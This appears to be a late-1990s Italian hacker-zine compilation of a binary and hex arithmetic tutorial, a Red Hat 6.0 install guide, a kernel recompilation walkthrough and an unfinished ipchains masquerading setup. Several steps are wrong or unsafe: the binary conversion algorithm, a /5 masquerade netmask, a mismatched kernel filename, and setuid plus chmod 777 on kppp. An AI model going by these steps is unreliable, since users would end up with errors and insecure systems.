11010010 = 1*2^8 + 1*2^7 + 0*2^6 + 1*2^5 + 0*2^4 + 0*2^3 + 0*2^2 + 1*2^1 + 0*2^0 = 210

Ora che abbiamo visto la conversione Base 10 -> Base 2 vediamo come si effettua l'operazione
inversa.
L'algoritmo è abbastanza semplice :

1 - Si divide la cifra decimale per 2
2 - Se il quoziente è pari si scrive 0 se è dispari 1
3 - Si divide il quoziente ancora per 2 e si ripete il passo 3
4 - La sequenza ottenuta RIBALTATA è la rappresentazione binaria del numero decimale

Vediamolo applicato al numero decimale 145 (questo è lo schema che di solito si utilizza):


145 |
72 | 1 ( cifra - significativa )
36 | 0
18 | 0
9 | 0
4 | 1
2 | 0
1 | 0
0 | 1 (cifra + significativa )

Quindi 145 in base 10 equivale a 10010001 in base 2. Semplice vero ??
NOTA: Una cosa da notare è che con N cifre binarie possiamo rappresentare tutti i numeri
da 0 fino a 2^N-1.

Ora che abbiamo conosciuto i numeri in base 2 andiamo a conoscere i numeri in base 16 che
risultano utili in quanto ogni cifra esadecimale corrisponde a 4 cifre binarie e il
passaggio da una base all'altra risulta facile.
Tanto per cominciare le cifre del Sistema esadecimale sono 16, direte 10 le conosciamo
ma le altre 6 ?? Beh si usano anche le prime sei lettere dell'alfabeto:

DEC 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
HEX 0 1 2 3 4 5 6 7 8 9 A B C D E F


Anche il sistema esadecimale è posizionale e quindi la conversione Hex ->Dec si fa nello
stesso modo visto prima ( naturalmente si usano le potenze di 16).
Un'altra conversione che serve spesso è quella da Esadecimale a Binario e viceversa.
Sono entrambe molto semplici in quanto come dicevamo prima tutte le cifre esadecimali si
possono codificare con quattro cifre binarie :

Hex Bin
0 0000
1 0001
2 0010
3 0011
4 0100
5 0101
6 0110
7 0111
8 1000
9 1001
A 1010
B 1011
C 1100
D 1101
E 1110
F 1111


Quindi il numero esadecimale 3F5 corrisponde al
001111110101
3 F 5
Per il viceversa basta. prendere il numero binario a blocchi di 4 cifre (partendo dalla
cifra meno significativa) e convertirli in cifre esadecimali:

10 0101 1101 0101 0010

0010 --> 2
0101 --> 5
1101 --> D
0101 --> 5
10 --> 2
Quindi corrisponderà al numero 25D52 esadecimale !!
Un altro sistema di numerazione adottato nel campo dei calcolatori fino a qualche tempo
fa era quello ottale (base 8), che lascio immaginare a voi come funzioni !!
In un programma assembly per specificare la base di numerazione si fa seguire al numero
una lettera :

b - Binario (es. 0100101101b)
o - Ottale (es. 543o)
d - Decimale (es. 982d)
h - Esadecimale (es. 0F23h)

Adesso siamo in grado di rappresentare solo i numeri positivi e quelli negativi?
Per questi i calcolatori utilizzano un metodo non sempre intuitivo: il complemento a 2.
Vediamo subito un esempio per capire come funziona, consideriamo il numero 5 e
rappresentiamolo in binario a 8 bit : 00000101, calcoliamo da questo la rappresentazione
binaria di -5, si procede nel seguente modo :

1 - Si complementano tutti i bit (0-->1 e 1-->0)

00000101
||||||||
11111010

2 - al numero ottenuto si somma 1

11111010 +
1
----------
11111011

3 - Il numero ottenuto è la rappresentazione binaria di -5
Per fare la verifica provate a sommare 5 a -5 e vedrete che otterrete 0
(attenzione : il bit eventuale di overflow viene perso in quanto nel nostro esempio abbiamo
specificato che stiamo usando solo 8 bit; anche in un calcolatore comunque il numero di bit
è limitato dalla dimensione dei registri) Quindi con n bit possiamo rappresentare i numeri
da -2^(n-1) a 2^(n-1)-1 (es. con 4 bit da -8 a 7) e il bit piu' significativo indica il segno:
se è 1 vuol dire che il numero è negativo.

Oltre al codice binario normale a volte sono utili altre rappresentazioni binarie dei numeri
decimali (utili come vedremo piu' avanti per le operazioni algebriche) come ad esempio la
notazione BCD (Binary Code Decimal). In BCD le 10 cifre del codice decimale vengono codificate
una ad una con 4 bit nel seguente modo:

Decimale 0 1 2 3 4 5 6 7 8 9
BCD 0000 0001 0010 0011 0100 0101 0110 0111 1000 1001


Così per rappresentare il numero decimale 145 basta codificare le sue cifre (1,4 e 5) con il
rispettivo codice BCD :

145 --> 101000101
L'Assembly non è un linguaggio tipizzato, nel senso che non esiste il tipo int, float, ecc...
sta al programmatore trattare i numeri in modo diverso a seconda di cosa essi rappresentano
nel momento in cui li usa.
In binario vengono rappresentati anche i caratteri. Per ogni carattere si usano 8 bit, per un
totale di 255 caratteri, per le corrispondenze carattere-codice si fa riferimento alla
convenzione ASCII. Tutti abbiamo da qualche parte una tabella dei codici ASCII.

Oltre a saper rappresentare i numeri binari bisogna saper fare anche le operazioni con essi,
spendero' solo poche parole ma una volta capito il meccanismo di base riuscirete benissimo a
risolvere complesse operazioni !!!.
Per capire come si effettua una somma basta pensare a cosa avviene con i numeri in base 10 e
ricordarsi che in base 2 ci sono solo due cifre.
Quindi (in base 10) se sommo 7 a 6 scrivo 3 con il riporto di 1, sommo il riporto a 0 e
unendo i risultati ottengo (magia) 13.
In decimale il riporto si ha quando la somma supera 10 in binario quando la somma supera 2,
quindi ad esempio:

10100011 +
10100101
----------
101001000
Provate a fare qualche esempio vedrete che è facilissimo, l'importante è aver capito il
meccanismo che sta alla base (se proprio non lo capite andate a rileggervi i quaderni delle
elementari !!!!)

Ora che abbiamo capito come fanno a "contare" i computer vediamo come fanno a fare altre
utili operazioni, guardiamo in particolare le operazioni logiche. La logica è un ramo della
matematica che stabilisce se un predicato è vero o falso(chiedo scusa ai matematici per la
definizione un po'troppo semplicistica), quindi noi assegneremo il valore 1 a vero e il
valore 0 a falso e il gioco è fatto.
Le principali sono: AND, OR, NOT, XOR.
Noi ci chiederemo cosa risulta 1 and 1 oppure 0 or 1 ecc...
Per brevità e data la semplicità riporto solo le tabelle di verità di queste operazioni
logiche, in ingresso avremo una o due variabili binarie X e Y e in uscita verrà prodotta
la variabile Z che varrà 0 o 1 a seconda dell'operazione logica; quindi:

AND X Y | Z
0 0 | 0
0 1 | 0 Z = X and Y
1 0 | 0
1 1 | 1


OR X Y | Z
0 0 | 0
0 1 | 1 Z = X or Y
1 0 | 1
1 1 | 1


XOR X Y | Z
0 0 | 0
0 1 | 1 Z = X xor Y (or esclusivo)
1 0 | 1
1 1 | 0

NOT X | Z
0 | 1 Z= not X ( il NOT a differenza degli altri è un
1 | 0 operatore unario: opera su una sola
variabile)

Questo è quello che si chiama condensato di logica però è tutto quello che ci serve
sapere sulle operazioni, se volete approfondire il concetto contattatemi e sarò lieto
di darvi altre informazioni su questo campo della matematica 8-)

Beh ora penso di avervi stufato abbastanza con tutta questa matematica ma ritengo che
una buona comprensione di questi argomenti faciliti molto la comprensione di quello che
faremo in futuro, infatti con il linguaggio Assembly si lavora principalmente con numeri
esadecimali, quindi resistete e fate un po' di esempi per capire se avete capito.


Per richieste, consigli, suggerimenti, aiuti, contributi, ecc..., contattatemi

b0nu$, Emanuele DelBono
via Bazoli 27
25127 Brescia
Tel 030 - 314591
e-mail : bonus@numerica.it



hAck & c ya :-)


--------------------------------------------------------------------------------

** bonus@numerica.it **



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-




_____ _ _ _
/ ___| (_) | | (_) BoBo & LaNdo
\ `--. ___ _____ ___ _ __ ___ | | _ _ __ _ ___ __
`--. \/ _ \_ / |/ _ \| '_ \ / _ \ | | | | '_ \| | | \ \/ /
/\__/ / __// /| | (_) | | | | __/ | |___| | | | | |_| |> <
\____/ \___/___|_|\___/|_| |_|\___| \_____/_|_| |_|\__,_/_/\_\





INSTALLARE LINUX: by LiQUID



'ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"+- +- +- +- +- +- +- +- +-
'º Installare Linux º-=-=-=-=-=-=-=-=-=-=-=-=-=-
'ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"
°º Powered by [LiQUID] º
Indice: ²ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ1/4
00 Indice ;) °º\ / /$#@ ]
01 Disclaimer ²º \++++++++++/-------/ $#@ ]
02 Cos'e' Linux °º \ / / $#@ ]
03 Parte 1, installazzione ²º \ /\ / $#@ ]
04 Appendice 1 °º \ / \ / $#@ ]
05 Appendice 2 °º \ / \ / $#@ ]
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ²º \ / \ / $#@ ]
³ liquido@freemil.it ÃÄÄÄÄÄ1/4+-+-+-\/+-+-+-\/+-+-+-+#@ ]
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Disclaimer
Prima di iniziare vorrei dire che l'autore (io) non puo' essere coinvolto
o ritenuto colpevole se succedesse qualcosa di ....strano ;) Inoltre non
promette nulla riguardo il corretto funzionamento di questa semplice tecnica.
Se pensate di essere coinvolti in qualsiasi maniera in brutte faccende
leggendo il testo qui di seguito, fermatevi immediatamente e cancellate
questo sporco pugno di bit dal vostro picci! ;-P
Se per caso voi veniste coinvolti lo spirito di affrontare questa spiacevole
situazione e': 'Io non c'ero, non sono mai esistito, non ne ho la piu' pallida
idea di come quello sporco pugno di bit sia finito nel mio picci'!'

Salve a tutti.....be' vediamo come posso incominciare?? Innanzitutto questo articolo
parlerà su come installare correttamente linux sul proprio sistema. Prima di partire
con l'installazione vera e propria ci terrei a fare una piccola introduzione sul
sistema linux, appunto.

Che Cos'e' Linux?
Linux e' una emulazione gratuita di UNIX per personal computer (386-Pentium PRO),
Digital Alpha, PowerPC, Sun SPARC, Apple Macintosh, Atari ST/TT, Amiga, MIPS, che supporta
in pieno multitasking (può eseguire più operazioni nello stesso momento), multi-user
(supporta più utenti, anche sulla stessa macchina), multithreading, multiplatform
(e' in grado di girare su differenti piattaforme , non solo INTEL ma anche Digital Alpha,
PowerPC, Sun SPARC, Macintosh e MIPS), prevede funzioni di protezione della memoria tra
processi (in maniera tale da
non consentire ad un solo programma di mandare in crash l'intero sistema), X Windows,
TCP/IP, ottima capacita' di comunicazione con altri sistemi operativi (quali quelli della
Microsoft, Apple, Novell) e molto altro ancora. Le sue radici sono profondamente radicate
in Internet. Le prime versioni del sistema sono state sviluppate interamente da Linus
Torvalds (torvalds@transmeta.com) presso l'Universita' di Helsinki in Finlandia, ma cio'
che rende Linux cosi' diverso e' il fatto di essere cresciuto grazie all'aiuto di
moltissimi ed eterogenei gruppi di programmatori UNIX ed esperti di Sistemi Operativi
che hanno messo a disposizione il codice sorgente da loro prodotto, gratuitamente. Questa
eterogeneita' si riferisce sia alle competenze tecniche e al settore di provenienza che
alla dislocazione geografica. Affinche' queste comunita' di programmatoripotessero lavorare
insieme era necessario un efficiente strumento di comunicazione. Lo strumento fu Internet
ed essendo Linux il sistema operativo scelto da queste persone, significa che gli strumenti
e le utility necessarie ad utilizzare la Rete furono tra le prime a comparire.
Oltre ad essere sviluppate appositamente per Linux, molte delle applicazioni furono portate
da quello che era il miglior software disponibile in quel momento sul mercato.
Per esempio, il compilatore C e' gcc (della Free Software Foundation): si tratta di un
compilatore che viene comunemente utilizzato su piattaforma HP e Sun. In 7 anni Linux e'
diventato il sistema operativo piu' evoluto tecnicamente dell'intera categoria e - a causa
della disponibilita' dei sorgenti - e' diventato il punto di riferimento per lo sviluppo
del kernel da parte di Microsoft e SCO. Inoltre molti degli sviluppatori di
Solaris/QNX/AIX/SCO e NT, quando vanno a casa la sera - riscrivono e aggiungono le loro
uniche e talvolta proprietarie tecnologie nel codice pubblico di Linux in modo che tutti
gli altri possano utilizzarle. Questi sono i punti principali che rendono linux il s.o.
più utilizzato da programmatori professionisti e non (data la semplicità di modificarlo
od ampliarli, avendo a disposizione il codice completo del kernel e di tutti i programmi
linux). Inoltre e' anche da aggiungere la nota affidabilità in ambito di sicurezza, in
quanto e' stato adottato anche dalla NASA (Wow).

Ora che ho finito (FINALMENTE!!!) questa pallosissima introduzione su qusto magnifico
s.o., possiamo procedere con l'installazione vera e propria.
LINUX, PARTE 1 - INSTALLAZIONE

Questa breve nota e' rivolta a tutti coloro che, spaventati dai primi insuccessi, hanno
desistito dal tentativo di installare Linux, privandosi così della possibilità di conoscere
e adoperare questo potente e affascinante sistema operativo (S.O.). Consapevole delle
difficoltà che può incontrare un principiante cerchiamo di chiarire alcuni punti che
possano aiutare chi vuole iniziare a lavorare con Linux.
Premetto che il mio punto di riferimento sarà il CD-ROM della rivista Inter.Net del mese
di giugno, facilmente reperibile. Quindi se vi trovate in difficoltà perché alcune voci
che io menzionerò non combaciano con quelle che appariranno a VOI sullo schermo, non
prendetevela con me.....forse state installando una distribuzione del S.O. diversa da
quella citata sopra. Per la cronaca io procederò con l'installazione della distribuzione
RedHat 6.0.

Prima di tutto vi dovrete creare un disco boot di installazione, detto anche disco di
immagine, ovvero il disco che fa partire l'installazione di Linux.
Quindi apriamo il programma per crearci il disco d'immagine facendo:

C:\> d:
D:\> cd redhat\dosutils
D:\redhat\dosutils> rawrite
Enter disk image source file name: ..\images\boot.img
Enter target diskette drive: a:
Please insert a formatted diskette into drive A: and
press --ENTER-- : [Enter]
D:\dosutils>

Perfetto, ora abbiamo creato il nostro meraviglioso disco boot.
Schiaffiamolo dentro il lettore floppy e riavviamo!
Ora ci dovrebbe apparire qualcosa del tipo:

Loading initrd.img.........
Loading vmlinuz.........

Welcome to Red Hat Linux!

OKI, siamo nel programma di installazione J
Spingete invio, vi si chiederà la lingua, scegliete e premete invio, poi scegliete anche
la tastiera: it. A questo punto il programma di installazzione chiederà da dove si vuole
installare Linux. Noi scegliamo la voce CD-ROM, e confermiamo con invio. Apparirà una
finestra: inserire il vostro Red Hat CD nel lettore; confermiamo anche qui con invio.
Poi apparirà una finestra che chiederà se aggiornare o installare il sistema. Scegliete
installare. Apparirà una finestra con suscritto: che tipo di sistema volete installare?...,
e poi una piccola lista: Server, Workstation, e Custom. Optate per Custom. Alla domanda
se avete il controller SCSI, fate voi, io non ne ho J.
Quindi si dovrà scegliere quale programma usare per partizionare l'HD. Io uso Disk Druid.
Ora dovete aggiungere una partizione swap ed una native. Iniziamo col cancellare HDA1,
premendo delete (poi la riaggiungeremo, non vi speventate J. Iniziamo ad aggiungere
quella native. Quando premiamo aggiungi ci verrà un'altra finestra. In Mount point mettiamo
/, mentre in Size (megs) bisogna mettere lo spazio da dedicare alla partizione. Ricordatevi
che bisogna aggiungere anche la mini partizione swap. Io la metto da 125 Mb, forse e' un po'
troppo ma di spazio ne ho da vendere. In teoria dovrebbe essere un po' più della RAM
effettiva, ma come ho già detto, non mi faccio problemi di spazio J. In Type scegliamo
la voce Linux Native.
Se tutto e' filato liscio, aggiungiamo la partizione swap. In Mount lasciamo vuoto e in
Size lo spazio rimanente, in Type: Swap. Abbiamo finito con le partizioni. Premere ok
e alla finestra area di swap attiva selezionate solo /dev/hdc5, confermando con ok.
Apparirà quindi una finestra con 'partizione da formattare'. Selezionate /dev/hdc1
Ok e qui abbiamo finito questa prima parte.
Passiamo ora a selezionare i vari pacchetti da installare.
Printer Support: io non lo metto, tanto la stampante la usa solo mio padre ;-P
X Windows System: si, certo
Gnome: no, poiche' ho sentito dire che lo Gnome e' troppo bucato, cmq preferisco il Kde
KDE: si, l'ho detto prima ;)
Mail/www et tools: si, ci serviranno, ovviamente
Dos/Windows connectivity: beh, per ora mettetelo, all'inizio può sempre servire
File managers: certo ;)
Graphics manipolation: a me piace, io lo metto, mi diverto con la gerafica ;)
Consol Games: non lo metto, tanto se devo giocare vado sotto il Windozzo
X games: setesso discorso di prima
Consol multimedia: si, la bouna musica gothic fa SEMPRE bene!
X multimedia support: idem, come prima
Net Woeked Workstation: si, certo
Dialup Workstation: si
News server: no, grazie
Nfs server: ma neanche...
Smb (Samba) connectivity: si, e' carino, ci potrà servire per qualche netbios sparso per
la rete ;)
Ipx/netware connectivity: no, non mi serve
Anonimus ftp server: be' per me e' utile per scambiare file con amici....
Web server: no
Dns name sever: no
Post gres sql server: no
Network management workstation: si
Text Document formatting: no
C Developement: naturalmente, ci serviranno tutte le libreire c!
Developement libraries: certo, vedi sopra
C++ developement: ricerto, rivedi sopra
X developement: riricerto, ririvedi sopra
Gnome developement: abbiamo il kde.....
Kernel developement: no, non e' che voglia impedirvi la configurazione del kernel ;), ma
questa voce non c'e' nel CD-ROM, e cmq nell'altro CD-ROM ci sono i kernel più aggiornati
Extra documentation: no, grazie
Tutto: secondo voi per cosa mi sono corroso le dita fino ad ora?
Perfetto, ora abbiamo finito anche con questa parte.
Il sistema procedrà con la copia dei file sull'HD. Quindi il Linuzzo ci dirà di aver
piazzato i log di installazzione in /tmp/install.log. Si creerà il file system ext, e
ci dirà che sta cercando l'overlopping, infine installerà il tutto.
Ci dirà che ha rilevato il mouse in ttyS0 (se lo avete in com1, guardate l'appendice porte).
Dovremo configurare il mouse, il mio e' terrone di una marca finllandese di merda e poi
mi scoccia cercare, quindi seleziono un Mouse Micro$oft Compatible (serial). Emulare i 3
tasti? Si graxie.
Alla finestrina di configurazione di rete (la rete LAN), mettiamo no; ed alla
configurazione del Time-Zone selezionate Europe/Rome.
A questo punto dobbiamo togliere i demoni che non serveono (nota: se all'avvio di Linux
troverete delle scritte FAILED in rosso, molto probabilmente avete sbagliato questa parte,
ma non dovrete reinstallare tutto da capo, xche' si possono cambiare da dentro Linux J. Ok,
i Demoni da togliere sono questi:atd, crond, lpd, nfs, pmcia, portmap, random, sendmail.
Anche questa operazione e' finita.
Configurazione stampante: volete configurare la stampante? Io metto no, ho già detto
sopra che non la uso.
Passwd di ROOT: Inserite la password di root. Dovete digitare due volte la pass. Per
evitare errori di digitazione. Ricordatevi che la password di root e' un aspetto critico
per la sicurezza del sistema ;)) ok, digitate la pass, ed il gioco e' fatto!
Autentication configuration:
[ ] enable nis
[*] use shadow passwd
[*] use md5 passwd.
Ok, segnate come sopra e premete invio.
BOOT DISK
Io uso Lilo, quindi del boot disk non me ne faccio nulla, e segno NO.
All'installazione di Lilo dovete installare il boot loader in /dev/hda Master Boot Record.
Poi dovete decidere quale sistema avviare di default, usando il tasto F2 per cambiare
selezione.
PCI Probe: ****
PCI entry:****
X SERVER:****
Ok, perfetto a me ha rilevato tutto correttamente ( che culooooo J
Monitor setup: il mio monitor e' anche questo terrone e non c'e' nella lista, quindi premo
Custom, e confermo con ok.
Ancora ok, e poi premo 800*600 (sto monitor del cazz' mi regge solo questa risoluzione L)
Continuo il setup del monitor, selezionando 50-70. Quindi dirà che deve testare le
impostazioni, per cui si preme ok e il video lampeggerà un po'. Vi confermerà la
conclusione del test. Poiché a me ha dato i risultati giusti, ho premo Uso di default,
altrimenti avrei dovuto scegliere manualmente le impostazioni. Si avvierà l'ambiente X
per vedere se tutto e' ben configurato, e premiamo sul pulsante prima dei 9 secondi,
altrimenti il Linuzzo penserà che non avremo visto nulla.
Chiederà se vogliamo avviare l'ambiente X all'avvio del sistema (io metto no, sono
innamorato della shell J.
CONGRATULAZIONI L'INSTALLAZIONE E' TERMINATA!!!!!
Ok ora il nostro piccì si riavvierà. Al login scriveremo root, e la nostra pass. Dovremo
trovarci nella shell. Quindi configuriamo la connessione.
Digitiamo vi /etc/ppp/options
Premiamo il tasto Esc + dd, poi :wq (per maggiori spiegazioni guardare l'appendice con i
comandi del vi). Con questo togliamo la parola lock dalla 1° riga, ed usciamo salvando.
Scriviamo echo x.x.x.x > /etc/resolv.conf (dove x.x.x.x e' l'indirizzo numerico del vostro
server). Andiamo in /usr/bin con un cd /usr/bin e scriviamo chmod u+s+ kppp, poi chmod 777
kppp. Ok, avviamo X premendo startx.
Qui andiamo sulla K > Internet > Kppp. Ora accounts > nuovo.
Nome connessione: quellochevolete
Numero Tel: il tel del vostro provider.
Autenticazione: PAP
Andate su Ip e selezionate Indirizzo dinamico. Su DNS aggiungete il DNS del vs. provider,
e selezionatelo. Su Gateway, selezionate Gateway predefinito. Su script di accesso lasciate
tutto com'e'. Su costi telefonici Italy > TUT e premete OK
Andate su Modem e come porta selezionate /dev/ttyS1
Velocità 115200.
Poi andate su Comandi Modem: e nella Stringa di inizializzazione al posto di ATZ scrivete
ATX3&F e su Stringa di chiamata sostituite ad ATDT ATX3DT.
Col mio modem riesco a connettermi, se avete problemi andate a controllare sul libretto del
vs modem. Premete OK.
Ritornati al kppp inserite user e passwd, e BUONA NAVIGAZIONE (ps se avete bisogno di
Netscape andate in /usr/bin/netscape ;)

Le ultime righe. Dobbiamo rendere il ns. sistema sicuro (wow). Andate a modificare il
file /etc/hosts.deny ed aggiungete ALL:ALL. in questo modo negate l'accesso a tutti gli
hosts remoti sul vs sistema.

Per ora e' tutto, la prossima volta (se mai ci sarà) configureremo il kernel.

APPENDICE 1: comandi VI
ESC i entra in modalità inserimento
ESC o aggiungi una riga sotto il cursore ed entra in modalità inserimento
ESC O aggiungi una riga sopra il cursore ed entra in modalità inserimento
ESC x cancella la lettera sotto il cursore
ESC dd cancella la riga in cui si trova il cursore
ESC :w salva il file
ESC :w nome_file salva il file con nome nome_file
ESC :q esci da Vi
ESC :wq salva e esci
ESC /chiave per cercare la parola chiave specificata dopo /. Usare poi n e p per
ricercare le ulteriori istanze, seguenti o antecedenti, della parola.

APPENDICE 2: PORTE
Cua0 sta per COM1, cua1 sta per COM2 ecc.
ttyS0 equivale a cua0, ttyS1 a cua1, e cosi' via...
hda e' l'hard disk IDE primario, hda1, hda2 ecc. sono le partizioni presenti.
hdb e' l'hard disk IDE secondario, per le partizioni stesso discorso.
hdsa e' l'hard disk SCSI primario.
tty1, tty2 ecc. sono i terminali locali.
ttyP0, ttyP1 ecc. sono i ter

  
minali remoti.



by [LiQUID]
liquido@freemail.it








+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-





RICOMPILAZIONE DEL KERNEL: by LaNdo



in tv: è spenta (mica mi voglio rincoglionire sono le 7:30am)

mi sono deciso a scrivere quest'articolo supplementare perchè insieme a
BoBo pensavamo che non tutti fossero capaci di ricompilare il kernel...

cominciamo con un po' di teoria:
Esistono 2 tipi di kernel monolitico e modulare:
- i kernel monolitici aspetto negativo: sono compilati per essere
caricati in ram all'avvio e non essere più toccati (es: avete
compilato il kernel (tutto monolitico) e volete cambiare irq o dma alla
vs scheda sonora ...: dovrete ricompilare il kernel con le nuove
impostazioni...; aspetto positivo: è più veloce in quanto ha tutti i
"drivers" necessari caricati già in ram...; sistemi operativi che
adottano questo tipo di kernel sono Sco OpenServer e Linux.

- i kernel modulari aspetto positivo: per cambiare un irq ad un driver
compilato come modulo non c'è bisogno di ricompilare tutto il kernel,..
basta modificare il relativo file di configurazione e riavviare il pc;
altro aspetto positivo: occupa meno memoria in quanto carica i
"drivers" (da ora in poi moduli) quando gli occorrono; aspetto
negativo: il sistema impiega più tempo quando necessita di un modulo
che non ha caricato e che deve caricare; sistemi operativi che adottano
questo tipo di kernel sono Linux e Sco UnixWare 7.

Non a caso ho inserito Linux in entrambe le categorie, con Linux è
infatti possibile (in fase di compilazione) decidere il tipo di kernel
da utilizzare,... un mio consiglio: usate il kernel modulare


ok basta teoria ... ora un po' di pratica :-)

iniziamo:
se avete già installato i sorgenti potete saltare questa fase...
(per default farò finta che il kernel da compilare sia il 2.2.11)
cd /usr/src (la dir dei sorgenti)
rm linux (rimuoviamo il link simbolico che punta alla dir dei
sorgenti)
mkdir linux-2.2.11 (creiamo la dir in cui copieremo il kernel)
ln -s linux-2.2.11 (creiamo un link alla dir del kernel)
tar xzvf /percorso/linux-2.2.11.tar.gz ./ (al posto del percorso
dovrete mettere la dir in cui si trova il kernel compresso)
rm -rf linux-2.2.10 (il kernel vecchio)
cd linux
ok ora avete copiato il kernel... bisogna configurarlo...

Esistono 3 modi per configurare il kernel:
- tramite gui (grafic user interface) da xwindow (non ci mettete la s
finale perchè non si chiama Xwindows (brrr ... orrore .. mi ricorda Wincess))
- tramite caratteri semigrafici da una shell
- tramite interfaccia testuale (un po' complicato, se sbagliate una
cosa dovete ricominciare d'accapo... lasciatela se possibile)

la seconda è la mia preferita :-) ... a voi la scelta:

- make xconfig (lo dovete far partire da una finestra di Xwindow)
- make menuconfig (da una shell)
- make config (da una shell)

sceglietene solo uno !!!!!

ora vi appariranno tutte le impostazioni... se sapete un po' d'inglese
ok... altrimenti prendetevi un vocabolario ... per ogni voce c'è cmq la
spiegazione ...
ps: quando selezionate una voce vi possono apparire: un asterisco *
(che vuol dire che state configurando quella voce come monolitica, una M
che vuol dire che la state configurando come modulo, o uno spazio
vuoto che vuol dire che non volete quella voce...

quando avete finito salvate la configurazione... e uscite al prompt

adesso viene la compilazione vera e propria... mettetevi pure comodi
... al prompt digitate:

make dep; make clean; make bzImage; make modules; make modules_install; depmod -a

.... dovrete aspettare un po'... dipende dalla cpu....

ok appena terminato copiamo il nuovo kernel nella sua dir:
cp /usr/src/linux/arch/i386/boot/bzImage /boot/vmlinuz-2.2.10

ora bisognerà aggiornare lilo:
vi /etc/lilo.conf
e aggiungete le seguenti linee:
image= /boot/vmlinuz-2.2.10
root= /dev/sda2 (hd e partizione in cui è installato linux)
label= linux (dovrete cambiare il label del kernel vecchio)
read-only


ora uscite dal vi e aggiornate il mbr digitando:
lilo

e ora riavviate .. sperando che non abbiate combinato casini con:
shutdown -r now

.... nel caso non funzionasse (vi ricordate che vi avevo detto? :
"aggiungete le seguenti linee" .. .che vuol dire che le precedenti sono
rimaste e quindi potete bootare ancora il vecchio kernel ... altrimenti
.... avanti col dischetto rescue....)

.........e con questo è tutto...... Byex LaNdo






+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-






ROUTING E MASQUERADING IN LINUX





Il Routing e Masquerading in Linux (ovvero come navigare
sicuri in Internet utilizzando un firewall Linux)

in tv: le qualifiche del GP di Silverstone (azz!! Schumacher è
secondo !! ... mannaggia ad Hakkinen du caiz)

by LaNdo



Ero indeciso sull'argomento di questo articolo, poi ho pensato ai Lamah
(alcuni pure stupidi, altri solo esagitati) che girano in rete che con
programmini stupidi presi chissà dove ti mandano in crash il tuo
povero Winzozz mentre stai chattando su Irc o stai postando una
domanda su un NewsGroup facendoti perdere oltre alla pazienza anche il
filo logico...

In questo articolo descriverò come impostare il routing tra 2 o più pc
di cui uno (il router vero e proprio) è in realtà un pc su cui "gira"
Linux; sarà argomento dei prossimi articoli la configurazione
dell'accesso PPP e la configurazione della funzione di filtro del
Firewall (naturalmente il Linux); Non faccio riferimento a Firewall per
Wincess (tipo Conseal o @t-guard,...) perchè notoriamente più facili da
crashare ;-)


PS: Naturalmente per far funzionare quello che sto per spiegarvi avrete
bisogno di almeno 2 pc e almeno 2 schde di rete (compratevele le
vendono pure in macelleria a £30.000 !!!)

avete installato Linux ?
avete installato le schede di rete ?
... se non l'avete fatto che state aspettando ?...


Vabbè bando alle bojate cominciamo:...

Linux:
prima di tutto bisogna compilare il kernel (lo sapete fare vero? ve l'h spiegato nel_
l'articolo precedente) con le seguenti funzioni abilitate:

- Enable loadable module support (in modo da abilitare il
supporto per i moduli kernel, essendo il masquerading caricato
a livello di modulo)
- Networking support (mi sembra ovvio)
- Network Firewalls (abilitiamo le funzioni di firewall)
- TCP/IP Networking (supporto TCP/IP)
- IP: forwarding/gatewaying (abilitiamo le funzioni di
forwarding dei pacchetti IP)
- IP: firewalling (di firewall)
- IP: masqueradnig (di masquerading)
- IP: always defragment
- Dummy net drive support

Per default assegnerò al server Linux l'ip 192.168.0.1 e al pc con
windoze 192.168.0.2 il netmask (dipende da quanti pc avete...) nel
nostro caso sarà 255.255.255.0 (... 254 pc ... e che c'avete un
ufficio in casa ?)
per assegnare l'ip:
ifconfig eth0 192.168.0.1 netmask 255.255.255.0
/sbin/ipchains -P forward DENY
/sbin/ipchains -A forward -s 192.168.0.0/5 -d 0/0 -j MASQ
echo 1 > /proc/sys/net/ipv4/ip_forward
(questi ultimi 3 conviene metterli in uno dei file contenuti nella dir:
/etc/rc.d in modo da farlo partire all'avvio).

cmq....

Il Server Linux dovrà avere l'accesso PPP già abilitato (si trovano gli
script dappertutto ormai) (cmq vi rimando alla proxxima volta ... (PS:
preferite una spiegazione sull'accesso PPP o una spegazione sul
Firewalling in Linux? Ditemelo!: attila_hack@hotmail.com)

In realtà il server Linux avrà 2 indirizzi ip:
- il primo relativo alla nostra mini rete casalinga
- il secondo relativo alla connessione dial-up (internet)

... ok il nostro pc Linux è ora pronto per condividere l'accesso a
Internet ....

- Winlose 9x (configurazione)
Tra le impostazioni della rete (relativa alla scheda di rete) vanno
impostati:

-Gateway predefinito: indirizzo ip del pc Linux (nel ns caso:
192.168.0.1) (questo permetterà che le richieste per internet vengano
fatte direttamente al server Linux)
-Server DNS: gli stessi assegnati al pc Linux (per intenderci quelli
che avete inserito nello script PPP per la connessione ad internet su
Linux) (questo permetterà di effettuare il resolving dei nomi dei
domini (potreste farne anche a meno ...se vi ricordate che l'indirizzo
204.71.200.75 corrisponde a www.yahoo.com)

-Ip: naturalmente quello che vi pare (pure conforme al netmask ...
sinnò la rete ve la scordate...) nel ns caso: 192.168.0.2

un consiglio:
